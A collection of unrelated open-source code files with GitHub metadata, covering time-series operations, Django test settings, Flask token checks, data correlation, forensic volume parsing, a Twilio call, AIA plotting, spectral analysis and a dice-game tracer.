value = value_transform(row[value_column])
result[time] = value
return result
def operation(self, other, function, **kwargs):
"""Calculate "elementwise" operation either between this TimeSeries
and another one, i.e.
operation(t) = function(self(t), other(t))
or between this timeseries and a constant:
operation(t) = function(self(t), other)
If it's another time series, the measurement times in the
resulting TimeSeries will be the union of the sets of
measurement times of the input time series. If it's a
constant, the measurement times will not change.
"""
result = TimeSeries(**kwargs)
if isinstance(other, TimeSeries):
for time, value in self:
result[time] = function(value, other[time])
for time, value in other:
result[time] = function(self[time], value)
else:
for time, value in self:
result[time] = function(value, other)
return result
def to_bool(self, invert=False):
"""Return the truth value of each element."""
if invert:
def function(x, y):
return not bool(x)
else:
def function(x, y):
return bool(x)
return self.operation(None, function)
def threshold(self, value, inclusive=False):
"""Return True if > than treshold value (or >= threshold value if
inclusive=True).
"""
if inclusive:
def function(x, y):
return x >= y
else:
def function(x, y):
return x > y
return self.operation(value, function)
def sum(self, other):
"""sum(x, y) = x(t) + y(t)."""
return TimeSeries.merge(
[self, other], operation=operations.ignorant_sum
)
def difference(self, other):
"""difference(x, y) = x(t) - y(t)."""
return self.operation(other, lambda x, y: x - y)
def multiply(self, other):
"""mul(t) = self(t) * other(t)."""
return self.operation(other, lambda x, y: x * y)
def logical_and(self, other):
"""logical_and(t) = self(t) and other(t)."""
return self.operation(other, lambda x, y: int(x and y))
def logical_or(self, other):
"""logical_or(t) = self(t) or other(t)."""
return self.operation(other, lambda x, y: int(x or y))
def logical_xor(self, other):
"""logical_xor(t) = self(t) ^ other(t)."""
return self.operation(other, lambda x, y: int(bool(x) ^ bool(y)))
def __setitem__(self, time, value):
"""Allow a[time] = value syntax or a a[start:end]=value."""
if isinstance(time, slice):
return self.set_interval(time.start, time.stop, value)
else:
return self.set(time, value)
def __getitem__(self, time):
"""Allow a[time] syntax."""
if isinstance(time, slice):
raise ValueError("Syntax a[start:end] not allowed")
else:
return self.get(time)
def __delitem__(self, time):
"""Allow del[time] syntax."""
if isinstance(time, slice):
return self.remove_points_from_interval(time.start, time.stop)
else:
return self.remove(time)
def __add__(self, other):
"""Allow a + b syntax"""
return self.sum(other)
def __radd__(self, other):
"""Allow the operation 0 + TimeSeries() so that builtin sum function
works on an iterable of TimeSeries.
"""
# skip type check if other is the integer 0
if not other == 0:
self._check_time_series(other)
# 0 + self = self
return self
def __sub__(self, other):
"""Allow a - b syntax"""
return self.difference(other)
def __mul__(self, other):
"""Allow a * b syntax"""
return self.multiply(other)
def __and__(self, other):
"""Allow a & b syntax"""
return self.logical_and(other)
def __or__(self, other):
"""Allow a | b syntax"""
return self.logical_or(other)
def __xor__(self, other):
"""Allow a ^ b syntax"""
return self.logical_xor(other)
def __eq__(self, other):
return self.items() == other.items()
def __ne__(self, other):
return not (self == other)
def _check_boundary(self, value, allow_infinite, lower_or_upper):
if lower_or_upper == "lower":
infinity_value = -inf
method_name = "first_key"
elif lower_or_upper == "upper":
infinity_value = inf
method_name = "last_key"
else:
msg = '`lower_or_upper` must be "lower" or "upper", got {}'.format(
lower_or_upper,
)
raise ValueError(msg)
if value is None:
if allow_infinite:
return infinity_value
else:
try:
return getattr(self, method_name)()
except IndexError:
msg = (
"can't use '{}' for default {} boundary "
"of empty TimeSeries"
).format(method_name, lower_or_upper)
raise KeyError(msg)
else:
return value
def _check_boundaries(self, start, end, mask=None, allow_infinite=False):
if mask is not None and mask.is_empty():
raise ValueError("mask can not be empty")
# if only a mask is passed in, return mask boundaries and mask
if start is None and end is None and mask is not None:
return mask.first_key(), mask.last_key(), mask
# replace with defaults if not given
start = self._check_boundary(start, allow_infinite, "lower")
end = self._check_boundary(end, allow_infinite, "upper")
if start >= end:
msg = "start can't be >= end ({} >= {})".format(start, end)
raise ValueError(msg)
start_end_mask = TimeSeries(default=False)
start_end_mask[start] = True
start_end_mask[end] = False
if mask is None:
mask = start_end_mask
else:
mask = mask & start_end_mask
return start, end, mask
def distribution_by_hour_of_day(
self, first=0, last=23, start=None, end=None
):
start, end, mask = self._check_boundaries(start, end)
result = []
for hour in range(first, last + 1):
mask = hour_of_day(start, end, hour)
result.append((hour, self.distribution(mask=mask)))
return result
def distribution_by_day_of_week(
self, first=0, last=6, start=None, end=None
):
start, end, mask = self._check_boundaries(start, end)
result = []
for week in range(first, last + 1):
mask = day_of_week(start, end, week)
result.append((week, self.distribution(mask=mask)))
return result
def plot(
self,
interpolate="previous",
figure_width=12,
linewidth=1,
marker="o",
markersize=3,
color="#222222",
):
return plot.plot(
self,
interpolate=interpolate,
figure_width=figure_width,
linewidth=linewidth,
marker=marker,
markersize=markersize,
color=color,
)
def hour_of_day(start, end, hour):
# start should be date, or if datetime, will use date of datetime
floored = utils.datetime_floor(start)
domain = TimeSeries(default=False)
for day_start in utils.datetime_range(
floored, end, "days", inclusive_end=True
):
interval_start = day_start + datetime.timedelta(hours=hour)
interval_end = interval_start + datetime.timedelta(hours=1)
domain[interval_start] = True
domain[interval_end] = False
result = domain.slice(start, end)
result[end] = False
return result
def day_of_week(start, end, weekday):
# allow weekday name or number
number = utils.weekday_number(weekday)
# start should be date, or if datetime, will use date of datetime
floored = utils.datetime_floor(start)
next_week = floored + datetime.timedelta(days=7)
for day in utils.datetime_range(floored, next_week, "days"):
if day.weekday() == number:
first_day = day
break
domain = TimeSeries(default=False)
for week_start in utils.datetime_range(
first_day, end, "weeks", inclusive_end=True
):
interval_start = week_start
interval_end = interval_start + datetime.timedelta(days=1)
domain[interval_start] = True
domain[interval_end] = False
result = domain.slice(start, end)
result[end] = False
return result
|
{
"content_hash": "991bfb0702ea9ea207cfcd26c62b124d",
"timestamp": "",
"source": "github",
"line_count": 1120,
"max_line_length": 79,
"avg_line_length": 32.159821428571426,
"alnum_prop": 0.5597323634748327,
"repo_name": "datascopeanalytics/traces",
"id": "356b8d2e7c901fc900ecbc40bc61b6de128ea528",
"size": "36019",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "traces/timeseries.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "2140"
},
{
"name": "Python",
"bytes": "100644"
}
],
"symlink_target": ""
}
|
import os
DIRNAME = os.path.dirname(__file__)
DJANGO_PROJECT = 'test_app'
DJANGO_SETTINGS_MODULE = 'test_app.settings'
ADMINS = (
('', ''),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'ado_mssql'.
'NAME': 'test.db',
}
}
# Local time zone for this installation. All choices can be found here:
# http://www.postgresql.org/docs/current/static/datetime-keywords.html#DATETIME-TIMEZONE-SET-TABLE
TIME_ZONE = 'US/Pacific'
# Language code for this installation. All choices can be found here:
# http://www.w3.org/TR/REC-html40/struct/dirlang.html#langcodes
# http://blogs.law.harvard.edu/tech/stories/storyReader$15
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
#Image files will be stored off of this path
MEDIA_ROOT = os.path.join(DIRNAME, 'static/')
#MEDIA_ROOT = "/static"
# URL that handles the media served from MEDIA_ROOT.
# Example: "http://media.lawrence.com"
#MEDIA_URL = 'site_media'
MEDIA_URL="/static/"
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = ''
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
"django.middleware.common.CommonMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
#"django.middleware.csrf.CsrfViewMiddleware", # views in livesettings have enabled CSRF regardless of this setting
"django.middleware.locale.LocaleMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.doc.XViewMiddleware",
#'debug_toolbar.middleware.DebugToolbarMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = ('django.contrib.auth.context_processors.auth',)
ROOT_URLCONF = 'test_app.urls'
INSTALLED_APPS = (
'django.contrib.sites',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.comments',
'django.contrib.flatpages',
'django.contrib.sessions',
'django.contrib.sitemaps',
'livesettings',
'keyedcache',
'test_app.localsite',
)
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
)
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS' : False,
}
CACHE_PREFIX = 'T'
CACHE_TIMEOUT = 300
# If you use logging with the level DEBUG in your application, prevent increasing
# of logging level of keyedcache by uncommenting the following:
#import logging
#logging.getLogger('keyedcache').setLevel(logging.INFO)
DEBUG = True
|
{
"content_hash": "8119b192a257f75b618cd0e666edd6b0",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 119,
"avg_line_length": 30.303030303030305,
"alnum_prop": 0.7196666666666667,
"repo_name": "pombredanne/django-livesettings",
"id": "32db4fb39098c2d3cb8b6eb72c80b0b7084d0e65",
"size": "3187",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "livesettings/test_app/settings.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
import jwt
import json
import urllib2
from functools import wraps
from flask import request
from app.handler.dbHelper import DBHelper
from app.config import DOP_API_RPT
from app.handler.error_handler import CustomError, PermissionDenied, NotAuthorized
__author__ = 'Xiaoxiao.Xiong'
def validate_token(auth):
"""
Inspect ext_id
:param auth: the content of HTTP Authorization header
:return: Boolean true/false
"""
parts = auth.split()
if len(parts) != 2:
raise CustomError('Wrong context of Authorization Header')
if parts[0].lower() != 'bearer':
raise CustomError('Unsupported authorization type')
if DBHelper.check_token(parts[1]):
return True
else:
return False
def require_token(fn):
@wraps(fn)
def _wrap(*args, **kwargs):
if 'Authorization' not in request.headers:
raise CustomError('Authorization header Required')
auth = request.headers['Authorization']
f = validate_token(auth)
if f is not True:
raise PermissionDenied(payload={'detail': 'Invalid ext_id'})
return fn(*args, **kwargs)
return _wrap
def validate_rpt(rpt):
"""
Inspect RPT via requesting api of DOP
:param rpt: JWT Token
:return: Boolean, if RPT valid return True, otherwise return False
"""
try:
req = urllib2.Request(DOP_API_RPT, json.dumps({'rpt':rpt}))
req.add_header('Content-Type', 'application/json')
f = urllib2.urlopen(req, timeout=4).read()
obj = json.loads(f)
if 'status' not in obj:
raise AttributeError('Authorization server did not response an expecting message')
if obj['status'] == True:
return True
elif obj['status'] == False:
return False
else:
raise ValueError('Authorization server did not response an expecting value')
except Exception as e:
raise e
def require_rpt(fn):
@wraps(fn)
def _wrap(*args, **kwargs):
if 'Authorization' not in request.headers:
raise CustomError('Authorization header Required')
auth = request.headers['Authorization']
parts = auth.split()
if len(parts) != 2:
raise CustomError('Wrong context of Authorization Header')
if parts[0].lower() != 'bearer':
raise CustomError('Unsupported authorization type')
# Inspect RPT
f = validate_rpt(parts[1])
if f is False:
raise NotAuthorized('Invalid RPT', 401)
# get key_for_rpt from database to decode RPT
try:
pass
# payload = jwt.decode(parts[1], 'secret', algorithms=['HS256'])
except jwt.InvalidTokenError as e:
raise CustomError(repr(e), 403)
return fn(*args, **kwargs)
return _wrap
|
{
"content_hash": "4c7d4239ed0fc142c1ce637b82b2f4fd",
"timestamp": "",
"source": "github",
"line_count": 112,
"max_line_length": 94,
"avg_line_length": 25.580357142857142,
"alnum_prop": 0.6160558464223386,
"repo_name": "dhrproject/mydatasource",
"id": "045f3abebfffc276bfa94b15972a48de0a475c1f",
"size": "2865",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "DataSource/app/auth.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "77296"
},
{
"name": "Shell",
"bytes": "520"
}
],
"symlink_target": ""
}
|
"""
Calculate correlations and covariance
"""
import pandas as pd
import numpy as np
import xgboost as xgb
import operator
from sklearn import preprocessing
from sklearn.cross_validation import train_test_split
import matplotlib
matplotlib.use("Agg") # Needed to save figures
import matplotlib.pyplot as plt
# --- Import data ---
print("## Loading Data")
train = pd.read_csv('../inputs/train.csv')
# --- Process data ---
print("## Data Processing")
# Define parameters
output_col_name = "target"
id_col_name = "ID"
train = train.drop(id_col_name, axis=1)
# --- Calculate matrices and save to csv ---
print("## Calculating matrices")
print(" - Pearson correlation matrix")
correlation_p = train.corr() # Pearson method
correlation_p.to_csv('stats/correlation_matrix_pearson.csv')
# print(" - Kendall Tau correlation matrix")
# correlation_k = train.corr(method='kendall') # Kendall Tau
# correlation_k.to_csv('stats/correlation_matrix_kendall.csv')
print(" - Spearman correlation matrix")
correlation_s = train.corr(method='spearman') # Spearman
correlation_s.to_csv('stats/correlation_matrix_spearman.csv')
covariance = train.cov()
covariance.to_csv('stats/covariance_matrix.csv')
# --- Plot matrices ---
print("## Plotting")
plt.matshow(correlation_p)
plt.savefig('stats/correlation_matrix_pearson.png')
plt.clf()
# plt.matshow(correlation_k)
# plt.savefig('stats/correlation_matrix_kendall.png')
# plt.clf()
plt.matshow(correlation_s)
plt.savefig('stats/correlation_matrix_spearman.png')
plt.clf()
plt.matshow(covariance)
plt.savefig('stats/covariance_matrix.png')
plt.clf()
|
{
"content_hash": "9944bafbf0b215ac6ea5b4493d0ee7a8",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 63,
"avg_line_length": 25.125,
"alnum_prop": 0.7307213930348259,
"repo_name": "HighEnergyDataScientests/bnpcompetition",
"id": "7d807eb6bfa27cf6f4b879af82c123b95a537a23",
"size": "1843",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "feature_analysis/correlation.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "544000"
},
{
"name": "Python",
"bytes": "36365"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
from django.contrib import admin
from easy_maps.admin import AddressAdmin
from easy_maps.models import Address
admin.site.register(Address, AddressAdmin)
|
{
"content_hash": "cd71b41d62fe17511f9911b80d3111bc",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 42,
"avg_line_length": 32.333333333333336,
"alnum_prop": 0.8247422680412371,
"repo_name": "hfeeki/django-easy-maps",
"id": "0c1d0ffe0c9d0a223552ab2e9029ad562c2687c1",
"size": "218",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "easy_maps_tests/test_app/admin.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
}
|
"""The SleuthKit (TSK) volume system."""
from dfvfs.lib import definitions
from dfvfs.lib import tsk_partition
from dfvfs.volume import factory
from dfvfs.volume import volume_system
class TSKVolume(volume_system.Volume):
"""Volume that uses pytsk3."""
def __init__(self, file_entry, bytes_per_sector):
"""Initializes a volume.
Args:
file_entry (TSKPartitionFileEntry): a TSK partition file entry.
bytes_per_sector (int): number of bytes per sector.
"""
super(TSKVolume, self).__init__(file_entry.name)
self._file_entry = file_entry
self._bytes_per_sector = bytes_per_sector
def _Parse(self):
"""Extracts attributes and extents from the volume."""
tsk_vs_part = self._file_entry.GetTSKVsPart()
tsk_addr = getattr(tsk_vs_part, 'addr', None)
if tsk_addr is not None:
address = volume_system.VolumeAttribute('address', tsk_addr)
self._AddAttribute(address)
tsk_desc = getattr(tsk_vs_part, 'desc', None)
if tsk_desc is not None:
# pytsk3 returns an UTF-8 encoded byte string.
try:
tsk_desc = tsk_desc.decode('utf8')
self._AddAttribute(volume_system.VolumeAttribute(
'description', tsk_desc))
except UnicodeError:
pass
start_sector = tsk_partition.TSKVsPartGetStartSector(tsk_vs_part)
number_of_sectors = tsk_partition.TSKVsPartGetNumberOfSectors(tsk_vs_part)
volume_extent = volume_system.VolumeExtent(
start_sector * self._bytes_per_sector,
number_of_sectors * self._bytes_per_sector)
self._extents.append(volume_extent)
class TSKVolumeSystem(volume_system.VolumeSystem):
"""Volume system that uses pytsk3."""
TYPE_INDICATOR = definitions.TYPE_INDICATOR_TSK_PARTITION
VOLUME_IDENTIFIER_PREFIX = 'p'
def __init__(self):
"""Initializes a volume system.
Raises:
VolumeSystemError: if the volume system could not be accessed.
"""
super(TSKVolumeSystem, self).__init__()
self.bytes_per_sector = 512
def _Parse(self):
"""Extracts sections and volumes from the volume system."""
root_file_entry = self._file_system.GetRootFileEntry()
tsk_volume = self._file_system.GetTSKVolume()
self.bytes_per_sector = tsk_partition.TSKVolumeGetBytesPerSector(tsk_volume)
for sub_file_entry in root_file_entry.sub_file_entries:
tsk_vs_part = sub_file_entry.GetTSKVsPart()
start_sector = tsk_partition.TSKVsPartGetStartSector(tsk_vs_part)
number_of_sectors = tsk_partition.TSKVsPartGetNumberOfSectors(tsk_vs_part)
if start_sector is None or number_of_sectors is None:
continue
if tsk_partition.TSKVsPartIsAllocated(tsk_vs_part):
volume = TSKVolume(sub_file_entry, self.bytes_per_sector)
self._AddVolume(volume)
volume_extent = volume_system.VolumeExtent(
start_sector * self.bytes_per_sector,
number_of_sectors * self.bytes_per_sector)
self._sections.append(volume_extent)
factory.Factory.RegisterVolumeSystem(TSKVolumeSystem)
|
{
"content_hash": "cfe0f4e54720ee4a1df5e7079029c467",
"timestamp": "",
"source": "github",
"line_count": 91,
"max_line_length": 80,
"avg_line_length": 33.2967032967033,
"alnum_prop": 0.6914191419141914,
"repo_name": "joachimmetz/dfvfs",
"id": "9d49d07b1340ba443c3b5b6996444c7e846d59b3",
"size": "3054",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "dfvfs/volume/tsk_volume_system.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "14212"
},
{
"name": "Makefile",
"bytes": "122"
},
{
"name": "PowerShell",
"bytes": "1021"
},
{
"name": "Python",
"bytes": "2176548"
},
{
"name": "Shell",
"bytes": "19355"
}
],
"symlink_target": ""
}
|
import os
from twilio.rest import Client
# Your Account Sid and Auth Token from twilio.com/user/account
# To set up environmental variables, see http://twil.io/secure
account_sid = os.environ['TWILIO_ACCOUNT_SID']
auth_token = os.environ['TWILIO_AUTH_TOKEN']
client = Client(account_sid, auth_token)
# Get an object from its sid. If you do not have a sid,
# check out the list resource examples on this page
ip_access_control_list = client.sip \
.ip_access_control_lists("AL32a3c49700934481addd5ce1659f04d2") \
.update("Avons Lieutenants")
print(ip_access_control_list.friendly_name)
|
{
"content_hash": "0a6ccec585e1c1a0730211c1724450dd",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 68,
"avg_line_length": 37.1875,
"alnum_prop": 0.7579831932773109,
"repo_name": "TwilioDevEd/api-snippets",
"id": "7342e37c786e78011d58c3281f14a078e9b268f1",
"size": "668",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rest/sip-in/update-ip-acl-instance/update-ip-acl-instance.7.x.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C#",
"bytes": "637161"
},
{
"name": "C++",
"bytes": "24856"
},
{
"name": "Go",
"bytes": "7217"
},
{
"name": "HTML",
"bytes": "335"
},
{
"name": "Java",
"bytes": "912474"
},
{
"name": "JavaScript",
"bytes": "512877"
},
{
"name": "M",
"bytes": "147"
},
{
"name": "Objective-C",
"bytes": "53325"
},
{
"name": "PHP",
"bytes": "517186"
},
{
"name": "Python",
"bytes": "442184"
},
{
"name": "Ruby",
"bytes": "438928"
},
{
"name": "Shell",
"bytes": "3854"
},
{
"name": "Swift",
"bytes": "42345"
},
{
"name": "TypeScript",
"bytes": "16767"
}
],
"symlink_target": ""
}
|
"""
Plotting functions for easily and quickily visualizing synthesized AIA results
"""
import os
import numpy as np
import h5py
import matplotlib.pyplot as plt
import matplotlib.colors
import matplotlib.animation
import astropy.units as u
from astropy.coordinates import SkyCoord
from sunpy.map import Map
__all__ = ['plot_aia_channels', 'make_aia_animation']
def plot_aia_channels(aia, time: u.s, root_dir, corners=None, figsize=None, norm=None, fontsize=14,
**kwargs):
"""
Plot maps of the EUV channels of AIA for a given timestep
Parameters
----------
aia : `synthesizAR.instruments.InstrumentSDOAIA`
time : `astropy.Quantity`
root_dir : `str`
figsize : `tuple`, optional
"""
if figsize is None:
figsize = (15, 10)
if norm is None:
norm = matplotlib.colors.SymLogNorm(1e-6, vmin=1, vmax=5e3)
with h5py.File(aia.counts_file, 'r') as hf:
reference_time = u.Quantity(hf['time'], hf['time'].attrs['unit'])
i_time = np.where(reference_time == time)[0][0]
fig_format = os.path.join(root_dir, f'{aia.name}', '{}', f'map_t{i_time:06d}.fits')
fig = plt.figure(figsize=figsize)
plt.subplots_adjust(wspace=0., hspace=0., top=0.95)
ims = {}
for i, channel in enumerate(aia.channels):
tmp = Map(fig_format.format(channel['name']))
if corners is not None:
blc = SkyCoord(*corners[0], frame=tmp.coordinate_frame)
trc = SkyCoord(*corners[1], frame=tmp.coordinate_frame)
tmp = tmp.submap(blc, trc)
ax = fig.add_subplot(2, 3, i+1, projection=tmp)
ims[channel['name']] = tmp.plot(annotate=False, title=False, norm=norm)
lon, lat = ax.coords
lon.grid(alpha=0)
lat.grid(alpha=0)
if i % 3 == 0:
lat.set_axislabel(r'solar-y [arcsec]', fontsize=fontsize)
else:
lat.set_ticks_visible(False)
lat.set_ticklabel_visible(False)
if i > 2:
lon.set_axislabel(r'solar-x [arcsec]', fontsize=fontsize)
else:
lon.set_ticks_visible(False)
lon.set_ticklabel_visible(False)
ax.text(0.1*tmp.dimensions.x.value, 0.9*tmp.dimensions.y.value,
r'${}$ $\mathrm{{\mathring{{A}}}}$'.format(channel['name']),
color='w', fontsize=fontsize)
fig.suptitle(r'$t={:.0f}$ {}'.format(time.value, time.unit.to_string()), fontsize=fontsize)
if kwargs.get('use_with_animation', False):
return fig, ims
def make_aia_animation(aia, start_time: u.s, stop_time: u.s, root_dir, figsize=None, norm=None,
fontsize=14, **kwargs):
"""
Build animation from a series of synthesized AIA observations
"""
with h5py.File(aia.counts_file, 'r') as hf:
reference_time = u.Quantity(hf['time'], hf['time'].attrs['unit'])
start_index = np.where(reference_time == start_time)[0][0]
stop_index = np.where(reference_time == stop_time)[0][0]
fig_format = os.path.join(root_dir, f'{aia.name}', '{}', 'map_t{:06d}.fits')
fig, ims = plot_aia_channels(aia, start_time, root_dir, figsize=figsize, norm=norm,
fontsize=fontsize, use_with_animation=True)
def update_fig(i):
for channel in aia.channels:
tmp = Map(fig_format.format(channel['name'], i))
ims[channel['name']].set_array(tmp.data)
fig.suptitle(f'$t={reference_time[i].value:.0f}$ {reference_time.unit.to_string()}',
fontsize=fontsize)
return [ims[k] for k in ims]
animator_settings = {'interval': 50, 'blit': True}
animator_settings.update(kwargs.get('animator_settings', {}))
animation = matplotlib.animation.FuncAnimation(fig, update_fig,
frames=range(start_index, stop_index),
**animator_settings)
return animation
|
{
"content_hash": "604240ec2382d5d7acf92ab461a9ed2f",
"timestamp": "",
"source": "github",
"line_count": 97,
"max_line_length": 99,
"avg_line_length": 40.8041237113402,
"alnum_prop": 0.596766043456291,
"repo_name": "wtbarnes/synthesizAR",
"id": "d7f14cfe91ff0126b28035953ebc1aed164b50fa",
"size": "3958",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "synthesizAR/visualize/aia.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "168325"
}
],
"symlink_target": ""
}
|
not_found = {"message":"404 Not found"}
|
{
"content_hash": "5f557e014e61b1e1873bbb8ca8609b50",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 39,
"avg_line_length": 39,
"alnum_prop": 0.6666666666666666,
"repo_name": "Itxaka/pyapi-gitlab",
"id": "b132e40e3784e29f405990a074051c11471fd3c5",
"size": "39",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "response_data/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "105338"
},
{
"name": "Shell",
"bytes": "3331"
}
],
"symlink_target": ""
}
|
"""
Spectral analysis.
"""
import numpy as np
def transform(ts, xs):
"""
Calculate the discrete Fourier transform of a signal.
Parameters:
ts: Times.
xs: Signal values.
Returns:
The transformed frequencies and amplitudes.
Note:
The times must be equally spaced.
"""
try:
dt = ts[1] - ts[0]
except:
raise Exception('At least two time points required.')
freqs = np.fft.fftshift(np.fft.fftfreq(len(xs), d=dt))
# We use the inverse transform here to get the sign convention we need.
spectrum = np.fft.fftshift(np.fft.ifft(xs))
return freqs, spectrum
def find_peak(freqs, amps):
"""
Find the tallest peak (by magnitude) of a complex spectrum.
Parameters:
freqs: Frequencies.
amps: Spectrum values.
Returns:
Index and frequency of tallest peak.
"""
idx = np.argmax(abs(amps))
return idx, freqs[idx]
def interpolate(xs, freqs, amps, freq_window, factor):
"""
Interpolate a discrete Fourier spectrum.
This kind of interpolation is typically performed by zero-padding the
signal, but that is wasteful in space. This function is instead wasteful in
time, applying the discrete Fourier transform formula directly (and not
seeing the usual FFT speedup). However, if only a small region is to be
interpolated, this can be a worthwhile compromise.
Parameters:
xs: Signal values.
freqs: Frequencies.
amps: Spectrum values.
freq_window: Tuple containing the frequencies between which the
interpolation should happen.
factor: Scaling factor by which the density of points is to be increased.
Returns:
The interpolated frequencies and amplitudes.
Note:
The inputs must already be fftshifted, so that freqs is monotonically
increasing.
Note:
The spacing between the freqs doesn't have to be consistent (it's
possible to apply this interpolation several times), but the first and
last values have to be those from the original transform.
"""
assert freqs[0] <= freq_window[0], 'Invalid frequency window: {}, {}.'.format(freqs[0], freq_window[0])
assert freq_window[0] < freq_window[1], 'Invalid frequency window: {}, {}.'.format(freq_window[0], freq_window[1])
assert freq_window[1] <= freqs[-1], 'Invalid frequency window: {}, {}.'.format(freq_window[1], freqs[-1])
# Indices such that we bound freq_window as closely as possible.
idx_min, idx_max = np.argmax(freqs > freq_window[0]) - 1, np.argmin(freqs < freq_window[1])
# Indices before which we insert the new elements.
idxs = np.repeat(np.arange(idx_min, idx_max) + 1, factor - 1)
# Values to be inserted.
new_freqs = freqs[idxs - 1] + np.tile(np.arange(factor - 1) + 1, idx_max - idx_min) * (freqs[idxs] - freqs[idxs - 1]) / factor
new_amps = np.empty_like(new_freqs, dtype=complex)
for i, freq in enumerate(new_freqs):
# Find the fractional frequency index, taking into account the fftshift.
k = (len(xs) - 1) * (freq - freqs[0]) / (freqs[-1] - freqs[0]) - len(xs) // 2
new_amps[i] = sum(xs * np.exp(2j * np.pi * k * np.arange(len(xs)) / len(xs))) / len(xs)
return np.insert(freqs, idxs, new_freqs), np.insert(amps, idxs, new_amps)
|
{
"content_hash": "36467d57c8ebc5717098405e5ad1ce00",
"timestamp": "",
"source": "github",
"line_count": 101,
"max_line_length": 130,
"avg_line_length": 33.02970297029703,
"alnum_prop": 0.6522781774580336,
"repo_name": "0/realtimepork",
"id": "f7fe06df02766f5fa1ee4d27eb4b38d6febce50e",
"size": "3336",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "realtimepork/spectrum.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "55699"
}
],
"symlink_target": ""
}
|
import random
from hashlib import md5
TRACE_SOL = 'tests/play.sol'
TEST_SEED = 1337
NUM_TESTS = 1000
def hash(val):
return int(md5(str(val).encode()).hexdigest(), base=16) & 0xffffffff
def make_random_strat():
"""Makes a random pure strategy."""
seed = random.randrange(0, 2 ** 31)
def random_strat(score, opponent_score):
# Save the state of the random generator, so strategy calls don't
# impact dice rolls.
state = random.getstate()
random.seed(hash((score, opponent_score, seed)))
roll = random.randrange(-1, 11)
random.setstate(state)
return roll
return random_strat
class GameTurn(object):
def __init__(self, score, opponent_score, who, num_rolls):
if who == 0:
self.score0, self.score1 = score, opponent_score
else:
self.score0, self.score1 = opponent_score, score
self.who = who
self.num_rolls = num_rolls
self.rolls = []
self.dice_sides = 6
self.rerolled = False
self.score0_final, self.score1_final = None, None
def is_over(self):
"""Returns True iff this GameTurn should be over."""
return len(self.rolls) >= self.num_rolls
def is_successor(self, other):
"""Returns True if another GameTurn is a plausible successor of this
GameTurn. Used for preventing multiple calls to a strategy function
from messing up the tracer (to a reasonable degree)."""
# In case students call a strategy multiple times per turn.
if self.who == other.who:
return False
# In case students call both strategies regardless of whose turn it is
if self.score0 == other.score0 and self.score1 == other.score1 or \
not self.is_over():
return False
# In case students call a strategy after the game should be over
if max(other.score0, other.score1) >= 100:
return False
return True
def set_successor(self, other):
"""Sets another GameTurn as the successor of this GameTurn."""
self.score0_final , self.score1_final = other.score0, other.score1
def is_correct(self, sol_hash):
"""Returns True if the hash of this GameTurn matches the solution
hash."""
return hash(self) == sol_hash
@property
def turn_summary(self):
"""Returns a string containing a description of how who rolled how many
dice this turn."""
if self.num_rolls == -1:
return 'Player {0} rolls -1 dice and swaps the dice'.format(self.who)
elif self.num_rolls == 0:
return 'Player {0} rolls 0 dice:'.format(self.who)
elif self.num_rolls == 1:
return 'Player {0} rolls {1} {2}-sided {3}die:'.format(
self.who,
self.num_rolls,
'six' if self.dice_sides == 6 else 'four',
"rerolled " if rerolled else "")
else:
return 'Player {0} rolls {1} {2}-sided {3}dice:'.format(
self.who,
self.num_rolls,
'six' if self.dice_sides == 6 else 'four',
"rerolled " if self.rerolled else "")
@property
def turn_rolls(self):
"""Returns a string containing the dice values rolled this turn."""
return str(self.rolls)[1:-1]
@property
def dice_summary(self):
"""Returns a string containing a summary of the dice values rolled this
turn."""
if len(self.rolls) == 0:
return ''
return 'Dice sum: {0} {1}'.format(
sum(self.rolls),
'(rolled a 1)' if 1 in self.rolls else '')
